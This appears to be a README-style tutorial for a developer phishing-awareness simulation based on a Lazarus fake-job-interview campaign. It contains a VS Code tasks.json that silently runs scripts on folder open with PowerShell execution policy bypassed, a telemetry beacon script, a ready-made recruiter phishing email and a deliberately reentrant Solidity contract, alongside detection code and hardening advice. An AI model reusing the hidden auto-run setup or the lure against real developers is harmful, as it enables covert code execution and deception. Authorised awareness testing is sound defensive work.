Tags: #cybersecurity #vscode #phishing #infosec #redteam
Table of Contents
- Introduction
- The Real Threat: Lazarus Group
- How the Attack Works
- Building the Simulation
- Technical Deep Dive
- Setting Up Your Own Campaign
- Ethical Considerations
- Detection and Prevention
- Conclusion
Introduction
In early 2026, cybersecurity researchers uncovered a sophisticated attack campaign by the North Korean APT group Lazarus, targeting developers through fake job interviews. The attack leveraged VS Code's workspace trust feature to automatically execute malicious code when developers opened seemingly legitimate project repositories.
This article demonstrates how to build a safe, educational phishing simulation based on this real-world attack vector. The goal is to raise security awareness among development teams and teach them to recognize and defend against social engineering attacks.
Disclaimer: This project is intended strictly for educational purposes and authorized security awareness training within your organization. Unauthorized use against real targets is illegal and unethical.
The Real Threat: Lazarus Group
Attack Overview
Lazarus Group (also known as APT38, Hidden Cobra) is a North Korean state-sponsored threat actor known for:
- 2014: Sony Pictures hack
- 2016: Bangladesh Bank heist ($81M stolen)
- 2017: WannaCry ransomware
- 2022-2026: Targeting cryptocurrency companies and developers
The "Contagious Interview" Campaign
In their latest campaign, Lazarus operatives:
- Impersonate HR recruiters from legitimate cryptocurrency/DeFi companies
- Send attractive job offers to developers (often $180k-$220k salaries)
- Request candidates to "fix a bug" or "review code" in a GitHub repository
- Exploit VS Code's auto-task execution to compromise victims
Real-world impact:
- Theft of cryptocurrency wallet seed phrases (40+ wallet types)
- Exfiltration of browser passwords, cookies, and session tokens
- Installation of persistent backdoors
- Intellectual property theft
Reference: Contagious Interview Analysis
How the Attack Works
The Kill Chain
```mermaid
graph TD
    A[Attacker sends phishing email] --> B[Victim receives job offer]
    B --> C[Victim clones malicious repo]
    C --> D[Victim opens project in VS Code]
    D --> E[VS Code shows 'Trust Authors?' dialog]
    E -->|Victim clicks 'Yes'| F[.vscode/tasks.json executes]
    F --> G[Malicious script runs silently]
    G --> H[Data exfiltration begins]
    H --> I[Victim is compromised]
```
The Technical Mechanism
The attack exploits VS Code's Task Auto-Run feature:
File: .vscode/tasks.json
```jsonc
{
  "version": "2.0.0",
  "tasks": [
    {
      "label": "Initialize Development Environment",
      "type": "shell",
      "command": "./scripts/malicious-script.sh",
      "runOptions": {
        "runOn": "folderOpen" // WARNING: executes on folder open!
      },
      "presentation": {
        "reveal": "never", // Hidden from user
        "close": true      // Auto-closes terminal
      }
    }
  ]
}
```
Key parameters:
- `runOn: "folderOpen"`: triggers automatically as soon as the workspace is trusted
- `reveal: "never"`: hides the terminal window
- `close: true`: closes the terminal after execution
This means one click on "Trust Workspace" can execute arbitrary code without any further user interaction.
Building the Simulation
Project Goals
- Educate developers about social engineering risks
- Demonstrate real APT tactics in a safe environment
- Measure organizational security awareness
- Provide actionable security training
Architecture Overview
```text
GitHub Repository (Public - Fake DeFi Company Smart Contract Challenge)
├── .vscode/
│   ├── tasks.json             <- Auto-run configuration
│   └── settings.json
├── contracts/
│   └── TokenVault.sol         <- Realistic vulnerable code
├── scripts/
│   ├── init-workspace.js      <- "Malicious" payload
│   ├── init-workspace.sh
│   └── init-workspace.ps1
├── test/
│   └── TokenVault.test.js
└── README.md                  <- Convincing job challenge
          │
          │ HTTPS POST
          ▼
Internal Tracking Server (Private - Not included in repo)
├── Flask API Server
├── SQLite Database
├── Email Notification System
└── Analytics Dashboard
```
Technical Deep Dive
Component 1: The Bait Repository
Create a realistic DeFi project with an intentional vulnerability:
contracts/TokenVault.sol (Simplified)
```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Minimal token interface so the contract compiles stand-alone
interface IERC20 {
    function transfer(address to, uint256 amount) external returns (bool);
}

contract TokenVault {
    mapping(address => mapping(address => uint256)) public balances;

    // WARNING: INTENTIONAL VULNERABILITY: Reentrancy
    function withdraw(address token, uint256 amount) external {
        require(balances[msg.sender][token] >= amount, "Insufficient balance");
        // External call BEFORE state update - classic reentrancy!
        IERC20(token).transfer(msg.sender, amount);
        // State update happens after - attacker can re-enter
        balances[msg.sender][token] -= amount;
    }
}
```
This gives candidates a legitimate technical challenge while the real test is security awareness.
Component 2: Auto-Execution Configuration
.vscode/tasks.json
```json
{
  "version": "2.0.0",
  "tasks": [
    {
      "label": "Initialize Development Environment",
      "type": "shell",
      "command": "node",
      "args": ["${workspaceFolder}/scripts/init-workspace.js"],
      "windows": {
        "command": "powershell",
        "args": ["-ExecutionPolicy", "Bypass", "-File",
                 "${workspaceFolder}/scripts/init-workspace.ps1"]
      },
      "linux": {
        "command": "bash",
        "args": ["${workspaceFolder}/scripts/init-workspace.sh"]
      },
      "runOptions": {
        "runOn": "folderOpen"
      },
      "presentation": {
        "reveal": "never",
        "panel": "dedicated",
        "close": true,
        "echo": false
      },
      "problemMatcher": []
    }
  ]
}
```
Component 3: The "Malicious" Payload
scripts/init-workspace.js (Educational version)
```javascript
#!/usr/bin/env node
const https = require('https');
const os = require('os');
const { execSync } = require('child_process');

// Configuration
const TRACKER_URL = 'https://your-internal-tracker.corp/api/log';

async function collectTelemetry() {
  return {
    timestamp: new Date().toISOString(),
    username: os.userInfo().username,
    hostname: os.hostname(),
    platform: os.platform(),
    workspaceFolder: process.cwd(),
    event: 'vscode_workspace_opened',
    campaign: 'contagious-interview-2026'
  };
}

async function sendToTracker(data) {
  return new Promise((resolve) => {
    const payload = JSON.stringify(data);
    const url = new URL(TRACKER_URL);
    const options = {
      hostname: url.hostname,
      port: url.port || 443,
      path: url.pathname,
      method: 'POST',
      headers: {
        'Content-Type': 'application/json',
        'Content-Length': Buffer.byteLength(payload)
      },
      timeout: 3000,
      // Disables TLS certificate verification so a self-signed internal
      // tracker works; never carry this setting into production code.
      rejectUnauthorized: false
    };
    const req = https.request(options, () => resolve());
    req.on('error', () => resolve()); // Silent fail
    req.on('timeout', () => { req.destroy(); resolve(); });
    req.write(payload);
    req.end();
  });
}

function showAwarenessNotification() {
  setTimeout(() => {
    const platform = os.platform();
    try {
      if (platform === 'darwin') {
        // macOS notification
        execSync(
          `osascript -e 'display notification "WARNING: You just executed unknown code! This was a security awareness test. Check your email." with title "Security Test"'`,
          { stdio: 'ignore' }
        );
      } else if (platform === 'linux') {
        // Linux notification
        execSync(
          `notify-send "Security Test" "WARNING: You just executed unknown code! Check your email." -u critical`,
          { stdio: 'ignore' }
        );
      } else if (platform === 'win32') {
        // Windows notification
        execSync(
          `powershell -Command "Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.MessageBox]::Show('WARNING: You just executed unknown code! This was a security awareness test.', 'Security Test', 'OK', 'Warning')"`,
          { stdio: 'ignore' }
        );
      }
    } catch {
      // A missing notifier (e.g. no notify-send) must not crash the script
    }
  }, 5000);
}

async function main() {
  try {
    const telemetry = await collectTelemetry();
    sendToTracker(telemetry).catch(() => {});
    showAwarenessNotification();
    console.log('Development environment initialized successfully');
  } catch {
    console.log('Workspace ready');
  }
}

main();
```
Key features:
- Collects only non-sensitive telemetry (username, hostname, timestamp)
- Shows immediate educational notification after 5 seconds
- Fails silently if tracking server is unavailable
- Cross-platform support (Windows, macOS, Linux)
- Does NOT collect passwords, tokens, or sensitive data
Component 4: The Phishing Email
```text
From: Sarah Chen <sarah.chen@defi-innovations.io>
Subject: Senior Blockchain Developer Position - Technical Assessment

Hi [Name],

I'm Sarah, Senior Technical Recruiter at DeFi Innovations.

We're impressed with your GitHub profile and would like to offer you
a Senior Blockchain Developer position (Remote, $180k-$220k + equity).

For technical evaluation, please:
1. Clone: https://github.com/defi-innovations/smart-contract-audit
2. Find and fix the reentrancy vulnerability in TokenVault.sol
3. Submit your solution within 48 hours

We value your time and will discuss the full offer after successful completion.

Best regards,
Sarah Chen
Senior Technical Recruiter
DeFi Innovations | Building the Future of Finance
```
Social engineering tactics used:
- High salary to create urgency and excitement
- Legitimate-sounding company name
- Technical challenge that seems reasonable
- Time pressure (48 hours)
- Professional tone and formatting
Setting Up Your Own Campaign
Prerequisites
- Internal network or VPS for tracking server
- SMTP server for email notifications
- Legal approval from your organization
- HR/Management buy-in
Step 1: Clone and Customize the Repository
```bash
# Clone the simulation repository
git clone https://github.com/toxy4ny/lazarus-code.git
cd lazarus-code

# Customize the company name, branding, and challenge
# Edit README.md, package.json, etc.
```
Step 2: Configure the Tracking URL
Edit all payload scripts to point to your tracking server:
scripts/init-workspace.js

```javascript
const TRACKER_URL = 'https://your-internal-tracker.company.local/api/log';
```

scripts/init-workspace.sh

```bash
TRACKER_URL="https://your-internal-tracker.company.local/api/log"
```

scripts/init-workspace.ps1

```powershell
$TrackerUrl = "https://your-internal-tracker.company.local/api/log"
```
Step 3: Deploy Your Tracking Server
You'll need to implement your own tracking server. Here's the API specification:
Required Endpoints:
```http
POST /api/log
Content-Type: application/json

{
  "timestamp": "2026-01-15T10:30:00Z",
  "username": "jdoe",
  "hostname": "LAPTOP-ABC123",
  "platform": "win32",
  "workspaceFolder": "C:\\Users\\jdoe\\Projects\\defi-vault",
  "event": "vscode_workspace_opened",
  "campaign": "contagious-interview-2026"
}
```

Response: 200 OK

```json
{
  "status": "ok",
  "id": 42
}
```
Recommended tech stack:
- Backend: Flask (Python), Express (Node.js), or FastAPI
- Database: SQLite, PostgreSQL, or MongoDB
- Email: SMTP integration with corporate mail server
- Dashboard: Simple HTML/JS or React frontend
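A minimal implementation of this endpoint, added here as an example rather than code from the lazarus-code project (which leaves the server to you). It uses only the Python standard library (http.server and sqlite3) in place of the Flask stack listed above, implements POST /api/log exactly as specified, and enforces the data-collection limits from the Privacy Protection section with a field allow-list: a payload that carries anything beyond the seven fields in the spec is rejected with 400, so a modified script cannot quietly start shipping secrets into the database. Port 5000 matches the dashboard URL used in Step 6; the database file name campaign.db and the 4 KB body limit are assumptions of this example.

```python
"""Tracking server for POST /api/log with a strict field allow-list.

Added example, not the project's own code. Standard library only
(http.server + sqlite3); the Flask version would validate the same way.
"""
import json
import sqlite3
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# Exactly the fields the API spec sends; anything else is rejected.
ALLOWED_FIELDS = {"timestamp", "username", "hostname", "platform",
                  "workspaceFolder", "event", "campaign"}
REQUIRED_FIELDS = {"timestamp", "username", "hostname", "event", "campaign"}
MAX_BODY_BYTES = 4096  # assumption: the spec payload is a few hundred bytes


def validate_event(obj) -> tuple:
    """Return (ok, reason). Rejects unknown keys, missing keys, non-string values."""
    if not isinstance(obj, dict):
        return False, "body must be a JSON object"
    extra = set(obj) - ALLOWED_FIELDS
    if extra:
        return False, "forbidden fields: " + ", ".join(sorted(extra))
    missing = REQUIRED_FIELDS - set(obj)
    if missing:
        return False, "missing fields: " + ", ".join(sorted(missing))
    if not all(isinstance(v, str) and len(v) <= 512 for v in obj.values()):
        return False, "all fields must be strings of at most 512 characters"
    return True, ""


def init_db(path: str) -> sqlite3.Connection:
    """Open (or create) the SQLite database holding one row per event."""
    conn = sqlite3.connect(path, check_same_thread=False)
    conn.execute("""CREATE TABLE IF NOT EXISTS events (
        id INTEGER PRIMARY KEY AUTOINCREMENT,
        received_at TEXT DEFAULT CURRENT_TIMESTAMP,
        payload TEXT NOT NULL)""")
    return conn


def store_event(conn: sqlite3.Connection, event: dict) -> int:
    cur = conn.execute("INSERT INTO events (payload) VALUES (?)", (json.dumps(event),))
    conn.commit()
    return cur.lastrowid


def handle_log(conn: sqlite3.Connection, body: bytes) -> tuple:
    """Pure request handler: returns (http_status, response_object)."""
    if len(body) > MAX_BODY_BYTES:
        return 413, {"status": "error", "reason": "body too large"}
    try:
        obj = json.loads(body.decode("utf-8"))
    except (UnicodeDecodeError, json.JSONDecodeError):
        return 400, {"status": "error", "reason": "invalid JSON"}
    ok, reason = validate_event(obj)
    if not ok:
        return 400, {"status": "error", "reason": reason}
    return 200, {"status": "ok", "id": store_event(conn, obj)}


def make_handler(conn):
    class LogHandler(BaseHTTPRequestHandler):
        def do_POST(self):
            if self.path != "/api/log":
                self.send_error(404)
                return
            length = int(self.headers.get("Content-Length") or 0)
            status, resp = handle_log(conn, self.rfile.read(length))
            out = json.dumps(resp).encode()
            self.send_response(status)
            self.send_header("Content-Type", "application/json")
            self.send_header("Content-Length", str(len(out)))
            self.end_headers()
            self.wfile.write(out)
    return LogHandler


if __name__ == "__main__":
    # Plain HTTP on localhost for a local trial; terminate TLS in front of it.
    db = init_db("campaign.db")  # file name is an assumption of this example
    ThreadingHTTPServer(("127.0.0.1", 5000), make_handler(db)).serve_forever()
```

The allow-list is the point of the example: the payload scripts in this repository send only the seven spec fields, but the server, not the client, is where the "ALLOWED / FORBIDDEN" rule from the privacy section has to be enforced, because the client runs on a machine you do not control once the campaign is live.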
Step 4: Push to GitHub
```bash
# Create a new organization or use existing
# Make the repository public for maximum realism
git remote add origin https://github.com/fake-company/challenge.git
git push -u origin main
```
Step 5: Craft Your Phishing Campaign
Email template variables:
- {{candidate_name}}
- {{candidate_email}}
- {{repository_url}}
- {{deadline}}
- {{salary_range}}
Targeting strategy:
- Start with security-aware teams (IT, DevOps)
- Gradually expand to all engineering
- Track department-wise statistics
Step 6: Launch and Monitor
```bash
# Start your tracking server
python3 tracker-server.py

# Monitor the dashboard
open http://localhost:5000/dashboard

# Send phishing emails
# (Use your organization's approved method)
```
Step 7: Debrief and Educate
Immediate actions (within 5 minutes):
- Show desktop notification to victim
- Send educational email with explanation
Follow-up (within 24 hours):
- Department-wide security training
- Share statistics (anonymized)
- Provide prevention guidelines
Long-term (monthly):
- Repeat campaigns with variations
- Track improvement over time
- Recognize security-conscious employees
Ethical Considerations
Legal Requirements
DO:
- Get written approval from legal/HR
- Include security awareness training in employee policies
- Notify employees that periodic testing will occur (without specifics)
- Anonymize data in reports
- Use only for authorized internal training
DON'T:
- Collect real credentials, passwords, or sensitive data
- Publicly shame employees who fall for the test
- Use as grounds for termination or punishment
- Deploy without organizational approval
- Share victim data outside security team
Privacy Protection
Data collection limits:
```jsonc
// ALLOWED
{
  "username": "jdoe",
  "hostname": "LAPTOP-123",
  "timestamp": "2026-01-15T10:30:00Z"
}

// FORBIDDEN
{
  "passwords": [...],
  "ssh_keys": [...],
  "browser_cookies": [...],
  "crypto_wallets": [...]
}
```
Responsible Disclosure
After the campaign:
- Explain what happened to all participants
- Educate on how to detect similar attacks
- Provide resources for secure development
- Celebrate those who reported the suspicious email
- Iterate on training based on feedback
Detection and Prevention
For Developers
Red Flags to Watch For
- Unsolicited job offers with high salaries
- Urgent technical challenges from unknown companies
- GitHub repositories from unverified organizations
- Email domains that don't match company websites
- Pressure to act quickly without proper vetting
Best Practices
Before opening any project:
```bash
# 1. Check the repository source
git remote -v
# Verify the domain matches the company's official website

# 2. Inspect .vscode/tasks.json
cat .vscode/tasks.json
# Look for "runOn": "folderOpen" - this is suspicious!

# 3. Check for auto-run scripts
grep -r "runOn" .vscode/
find . -name "*.sh" -o -name "*.ps1" -o -name "*.bat"

# 4. Review package.json scripts
grep -A 10 '"scripts"' package.json
# Look for "postinstall" or other auto-run hooks
```
VS Code security settings:
```jsonc
// settings.json
{
  "security.workspace.trust.enabled": true,
  "security.workspace.trust.startupPrompt": "always",
  "security.workspace.trust.banner": "always",
  "security.workspace.trust.emptyWindow": false,
  // Disable auto-task execution
  "task.allowAutomaticTasks": "off"
}
```
Use isolated environments:
```bash
# Option 1: Docker container (mount the repo and start inside it)
docker run -it --rm -v "$(pwd)":/workspace -w /workspace node:18 bash

# Option 2: Virtual machine
# Use VirtualBox, VMware, or cloud VM

# Option 3: Windows Sandbox (Windows 10/11 Pro)
# Enable in Windows Features
```
For Security Teams
Detection Strategies
1. Monitor for suspicious repositories

```bash
# GitHub API search for repos with auto-run tasks
curl -H "Authorization: token YOUR_TOKEN" \
  "https://api.github.com/search/code?q=runOn+folderOpen+in:file+filename:tasks.json"
```

2. Network monitoring
- Watch for unusual outbound connections from developer machines
- Alert on POST requests to unknown domains from code editors

3. Endpoint detection
- Monitor process trees for VS Code spawning unusual children
- Alert on: `code.exe -> node.exe -> curl/powershell/bash`

4. Email filtering: create rules for suspicious patterns such as
- Job offers with GitHub links
- Emails from new/unverified crypto companies
- Urgent technical assessments
- Salary ranges in subject lines
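The process-tree rule in item 3, written out as detection logic. This is an added example, not part of the original project: it runs over a constructed list of process-creation events in the shape of Sysmon Event ID 1 or EDR telemetry (pid, parent pid, image name, command line), walks each shell or downloader process up through its ancestors, and alerts only when a VS Code process is an ancestor and a script interpreter sits between the two. A shell spawned directly by the editor is the integrated terminal and is deliberately not alerted on. The image-name sets and the sample events are assumptions made for the example.

```python
"""Detect editor -> script interpreter -> shell process chains.

Added detection example, not part of the original project. Runs over a
constructed list of process-creation events shaped like Sysmon Event ID 1 or
EDR telemetry (pid, parent pid, image basename, command line).
"""
from dataclasses import dataclass

# Image-name sets are assumptions for the example; tune them to your fleet.
EDITOR_IMAGES = {"code.exe", "code", "code-insiders"}
INTERPRETER_IMAGES = {"node.exe", "node", "python.exe", "python3", "python"}
SHELL_IMAGES = {"powershell.exe", "pwsh.exe", "cmd.exe", "bash", "sh", "zsh",
                "curl", "curl.exe", "wget"}


@dataclass(frozen=True)
class ProcessEvent:
    pid: int
    ppid: int
    image: str      # executable basename as logged by the sensor
    cmdline: str


def ancestry(pid: int, by_pid: dict, limit: int = 16) -> list:
    """Process chain from pid upwards: leaf first, oldest known ancestor last.
    Stops at an unknown parent, a pid cycle, or after `limit` hops."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen and len(chain) < limit:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid].ppid
    return chain


def detect_auto_task_chains(events: list) -> list:
    """One alert per shell/downloader whose ancestry contains an editor with a
    script interpreter somewhere between them (the tasks.json -> node -> shell
    pattern). A shell directly under the editor is the integrated terminal and
    is left alone so the rule stays quiet on normal use."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for ev in events:
        if ev.image.lower() not in SHELL_IMAGES:
            continue
        chain = ancestry(ev.pid, by_pid)
        images = [p.image.lower() for p in chain]
        editor_idx = next((i for i, img in enumerate(images) if img in EDITOR_IMAGES), None)
        if editor_idx is None:
            continue
        between = images[1:editor_idx]          # everything between shell and editor
        if not any(img in INTERPRETER_IMAGES for img in between):
            continue
        path = " -> ".join(p.image for p in reversed(chain[:editor_idx + 1]))
        alerts.append(f"pid {ev.pid}: {path} | cmdline: {ev.cmdline}")
    return alerts


# Constructed sample telemetry: an integrated-terminal shell, a jest run and a
# user-launched shell (all benign) next to the chain the rule above describes.
SAMPLE_EVENTS = [
    ProcessEvent(100, 1,   "explorer.exe",   "explorer.exe"),
    ProcessEvent(200, 100, "Code.exe",       "Code.exe"),
    ProcessEvent(210, 200, "powershell.exe", "powershell.exe -NoLogo"),
    ProcessEvent(220, 200, "node.exe",       "node.exe node_modules/.bin/jest"),
    ProcessEvent(230, 200, "node.exe",       "node.exe scripts/init-workspace.js"),
    ProcessEvent(231, 230, "powershell.exe", "powershell -ExecutionPolicy Bypass -File scripts/init-workspace.ps1"),
    ProcessEvent(300, 100, "powershell.exe", "powershell.exe"),
]

if __name__ == "__main__":
    for alert in detect_auto_task_chains(SAMPLE_EVENTS):
        print("ALERT", alert)
```

Only the third chain fires (Code.exe -> node.exe -> powershell.exe); the integrated terminal and the test run do not, which is what keeps the rule usable on a developer fleet. The rule also catches the more realistic task chain where VS Code spawns a terminal shell that spawns node that spawns the payload shell, because the interpreter is still between editor and leaf. A payload that is a plain shell script (bash init-workspace.sh launched from the task shell) has no interpreter in the chain and this rule alone would miss it, so pair it with a command-line match on script paths under the workspace.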
Prevention Controls
1. Application whitelisting
- Allow only approved VS Code extensions
- Block execution of scripts from %TEMP%, Downloads, etc.

2. Network segmentation: restrict developer workstations from accessing
- Cryptocurrency wallet domains
- Paste sites (pastebin, etc.)
- Anonymous file sharing services

3. Mandatory code review

```yaml
# .github/workflows/security-scan.yml
name: Security Scan
on: [pull_request]
jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - name: Scan for auto-run tasks
        run: |
          if grep -r "runOn.*folderOpen" .vscode/; then
            echo "WARNING: Auto-run task detected!"
            exit 1
          fi
```
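The check that the grep in this workflow, the developer-side inspection under Best Practices and the "Key parameters" description all rely on, written as a proper parser. This is an added example, not code from the project: tasks.json is JSONC (VS Code accepts comments and trailing commas), and a regex such as `runOn.*folderOpen` misses a key and value split over two lines, so the script strips comments, parses the JSON, and reports every task whose `runOptions.runOn` is `folderOpen` together with the commands it would run on each OS and the presentation settings that hide the terminal. The embedded sample tasks.json is constructed to mirror Component 2, with the key/value split that defeats the grep.

```python
"""Scan a VS Code tasks.json for tasks that run on folder open.

Added example, not part of the original project. tasks.json is JSONC, so
comments are stripped before parsing; a plain grep for "runOn.*folderOpen"
misses the key and value on separate lines, this does not.
"""
import json
import re
import sys

AUTO_RUN_VALUE = "folderOpen"
OS_OVERRIDES = ("windows", "linux", "osx")


def strip_jsonc(text: str) -> str:
    """Remove // and /* */ comments outside string literals, then drop
    trailing commas before ] or } (a ",]" inside a string would also match;
    rare in practice and harmless for a scanner)."""
    out, i, n = [], 0, len(text)
    while i < n:
        ch = text[i]
        if ch == '"':                      # copy a string literal verbatim
            j = i + 1
            while j < n and text[j] != '"':
                j += 2 if text[j] == "\\" else 1
            out.append(text[i:j + 1])
            i = j + 1
        elif text.startswith("//", i):
            nl = text.find("\n", i)
            i = n if nl == -1 else nl
        elif text.startswith("/*", i):
            end = text.find("*/", i + 2)
            i = n if end == -1 else end + 2
        else:
            out.append(ch)
            i += 1
    return re.sub(r",(\s*[\]}])", r"\1", "".join(out))


def command_lines(task: dict) -> list:
    """Render the command a task would run, including per-OS overrides."""
    lines = []
    for scope in ("*",) + OS_OVERRIDES:
        spec = task if scope == "*" else task.get(scope)
        if not isinstance(spec, dict) or "command" not in spec:
            continue
        args = spec.get("args", [])
        args = args if isinstance(args, list) else [args]
        lines.append(f"{scope}: " + " ".join(str(a) for a in [spec["command"], *args]))
    return lines


def find_auto_run_tasks(tasks_json_text: str) -> list:
    """One finding per task configured with runOptions.runOn == "folderOpen"."""
    data = json.loads(strip_jsonc(tasks_json_text))
    findings = []
    for task in data.get("tasks", []):
        if not isinstance(task, dict):
            continue
        if (task.get("runOptions") or {}).get("runOn") != AUTO_RUN_VALUE:
            continue
        pres = task.get("presentation") or {}
        hide_markers = (("reveal", "never"), ("close", True), ("echo", False))
        findings.append({
            "label": task.get("label", "<unlabelled>"),
            "commands": command_lines(task),
            "hidden_terminal_settings": [k for k, v in hide_markers if pres.get(k) == v],
        })
    return findings


# Constructed sample mirroring Component 2, with "runOn" and "folderOpen" on
# different lines, a comment and a trailing comma, none of which trip the parser.
SAMPLE_TASKS_JSON = r'''{
  "version": "2.0.0",
  "tasks": [
    {
      "label": "Initialize Development Environment",
      "type": "shell",
      "command": "node",
      "args": ["${workspaceFolder}/scripts/init-workspace.js"],
      "windows": { "command": "powershell",
                   "args": ["-ExecutionPolicy", "Bypass", "-File",
                            "${workspaceFolder}/scripts/init-workspace.ps1"] },
      "runOptions": {
        "runOn":
          "folderOpen" // fires as soon as the workspace is trusted
      },
      "presentation": { "reveal": "never", "close": true, "echo": false },
    },
    { "label": "test", "type": "npm", "script": "test" }
  ]
}'''

if __name__ == "__main__":
    # Usage: python scan_tasks.py [path/to/.vscode/tasks.json]; exit 1 on a hit
    path = sys.argv[1] if len(sys.argv) > 1 else ".vscode/tasks.json"
    with open(path, encoding="utf-8") as fh:
        hits = find_auto_run_tasks(fh.read())
    for hit in hits:
        print(f"AUTO-RUN TASK: {hit['label']}")
        for line in hit["commands"]:
            print(f"  {line}")
        if hit["hidden_terminal_settings"]:
            print("  hides terminal via: " + ", ".join(hit["hidden_terminal_settings"]))
    sys.exit(1 if hits else 0)
```

The exit code makes it a drop-in replacement for the grep step in the workflow above. It reports the presence of an auto-run task, not maliciousness: legitimate projects occasionally use folderOpen tasks, so treat each hit as a review item and read the reported command lines.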
Measuring Success
Key Metrics
```python
# Campaign effectiveness (all rates in percent)
success_rate = (victims / total_targets) * 100
click_through_rate = (opened_emails / sent_emails) * 100
report_rate = (reported_suspicious / sent_emails) * 100

# Improvement over time (positive means fewer victims than in the previous campaign)
improvement = (previous_success_rate - current_success_rate) / previous_success_rate * 100
```
Sample Dashboard
```text
Campaign: Contagious Interview 2026
-----------------------------------
Targets:  150 employees
Victims:   23 (15.3%)
Reported:  12 (8.0%)
Ignored:  115 (76.7%)

By Department:
  Engineering: 18/100 (18%)
  Product:      3/30  (10%)
  Marketing:    2/20  (10%)

Time to Click:
  < 1 hour:    15 victims
  1-24 hours:   6 victims
  > 24 hours:   2 victims
```
Educational Materials
Post-Campaign Training
Email template for victims:
```text
Subject: Security Awareness Test Results

You participated in a simulated phishing attack based on real
tactics used by the Lazarus APT group.

WHAT HAPPENED:
You opened a repository and trusted the workspace, which
automatically executed a script via .vscode/tasks.json.

REAL-WORLD IMPACT:
In an actual attack, this could have resulted in:
- Cryptocurrency wallet theft
- Source code exfiltration
- Credential harvesting
- Persistent backdoor installation

HOW TO PROTECT YOURSELF:
1. Always verify the source before opening projects
2. Inspect .vscode/tasks.json for "runOn": "folderOpen"
3. Use VMs or containers for untrusted code
4. Enable VS Code's workspace trust features
5. Report suspicious job offers to security@company.com

RESOURCES:
- [Internal security wiki]
- [VS Code security guide]
- [Social engineering training]

Questions? Contact security-team@company.com
```
Training Workshop Outline
90-minute session:
1. Introduction (10 min)
   - Real-world attack statistics
   - Lazarus Group case studies
2. Live Demonstration (20 min)
   - Show the attack in action
   - Explain the technical mechanism
3. Hands-on Exercise (30 min)
   - Participants inspect malicious repo
   - Identify red flags
   - Practice safe code review
4. Prevention Strategies (20 min)
   - VS Code security settings
   - Isolated development environments
   - Email verification techniques
5. Q&A and Discussion (10 min)
Resources
Official Documentation
Security Research
Similar Projects
Conclusion
The "Contagious Interview" attack demonstrates how even security-conscious developers can fall victim to sophisticated social engineering when combined with technical exploitation. By building realistic simulations, we can:
- Educate teams about emerging threats
- Measure organizational security posture
- Improve incident response capabilities
- Foster a security-first culture
Key Takeaways
For Developers:
- Always verify project sources before opening
- Inspect `.vscode/tasks.json` for auto-run configurations
- Use isolated environments for untrusted code
- Report suspicious job offers immediately
For Security Teams:
- Regular phishing simulations improve awareness
- Combine technical and social engineering testing
- Focus on education, not punishment
- Measure improvement over time
For Organizations:
- Security awareness is everyone's responsibility
- Invest in regular training programs
- Celebrate employees who report suspicious activity
- Create a blame-free security culture
Next Steps
- Star this repository for future reference
- Customize the simulation for your organization
- Deploy your first awareness campaign
- Share your results and learnings with the community
- Contribute improvements back to this project
Contributing
We welcome contributions! If you have ideas for improving this simulation:
- Fork the repository
- Create a feature branch (`git checkout -b feature/amazing-improvement`)
- Commit your changes (`git commit -m 'Add amazing improvement'`)
- Push to the branch (`git push origin feature/amazing-improvement`)
- Open a Pull Request
Areas for Contribution
- Additional payload scripts (Python, Ruby, etc.)
- Improved notification systems
- Multi-language support
- Alternative scenarios (npm packages, browser extensions, etc.)
- Better analytics and reporting
License
This project is licensed under the MIT License - see the LICENSE file for details.
Important Legal Notice
This software is provided for educational and authorized security testing purposes only. Users are responsible for ensuring they have proper authorization before deploying this simulation. The authors assume no liability for misuse or unauthorized deployment.
By using this software, you agree to:
- Obtain proper authorization from your organization
- Use only in controlled environments
- Not collect sensitive personal data
- Comply with all applicable laws and regulations
- Use for security awareness training only
Acknowledgments
- Cybersecurity researchers who uncovered the original Lazarus campaign
- The VS Code team for building security features
- Security awareness professionals worldwide
Show Your Support
If this project helped improve your organization's security awareness, please:
- Star this repository
- Tweet about your experience
- Write a blog post about your campaign
- Share with your security community
Together, we can make the developer community more secure!